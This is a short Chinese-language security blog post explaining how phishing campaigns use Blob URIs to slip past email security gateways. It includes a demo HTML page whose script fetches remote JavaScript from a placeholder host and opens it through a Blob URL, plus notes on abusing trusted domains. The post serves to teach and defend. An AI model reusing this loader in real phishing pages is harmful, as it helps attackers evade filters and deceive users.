通過上一篇文章Cofense披露新型釣魚攻擊手法:利用 Blob URI 繞過 SEG,大概知道Blob URL的釣魚攻擊手法了。
下面再看個Demo,深入瞭解下攻擊原理。
一、攻擊實施路徑
1. 誘導階段
偽造可信郵件:
攻擊者構造包含合法域名鏈接的釣魚郵件(如baidu.com),利用百度品牌可信度降低用户警惕性。
繞過郵件網關:
鏈接指向的中間頁面託管在合法的服務上,HTML文件無惡意特徵,可順利通過傳統安全掃描。
2. 中間頁面加載
舉個簡單的HTML頁面看看。
中間頁面加載的HTML文件,包含經過Base64編碼的惡意腳本,關鍵代碼如下:
<!DOCTYPE html>
<html>
<body>
<script>
// 隱藏的惡意腳本加載邏輯
fetch('https://test.com/test.js').then(response=> response.text()).then(code => {
const blob = new Blob([code], {type: 'text/javascript'});
const blobUrl = URL.createObjectURL(blob);
window.location.href = blobUrl; // 關鍵一步,觸發Blob URI跳轉
});
</script>
</body>
</html>
該腳本通過動態加載外部JS文件,避免靜態特徵被檢測。
詳情:從Demo到防禦:揭秘Blob URI釣魚攻擊的原理與實戰防禦